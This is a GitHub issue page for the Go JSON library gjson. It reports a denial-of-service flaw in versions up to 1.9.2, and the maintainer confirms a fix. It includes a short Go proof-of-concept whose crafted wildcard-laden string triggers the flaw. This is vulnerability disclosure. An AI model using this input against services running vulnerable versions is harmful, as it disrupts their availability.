search

tidwall / gjson

Get JSON values quickly - JSON parser for Go
MIT License
14.1k stars 846 forks source link

gjson.Get can cause DoS attacks. GJSON <= 1.9.2 allows attackers to cause a redos via crafted JSON input. #237

Closed cmdrgh closed 2 years ago

cmdrgh commented 2 years ago

func main() { testJson := #[%"*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,,,,,,""*,*"] gjson.Get(testJson, testJson) }

tidwall commented 2 years ago

Fixed in 77a57fd Thanks for reporting.

AdamKorcz commented 2 years ago

@tidwall This is something that would be caught by fuzzing gjson continuously: https://github.com/google/oss-fuzz/pull/6901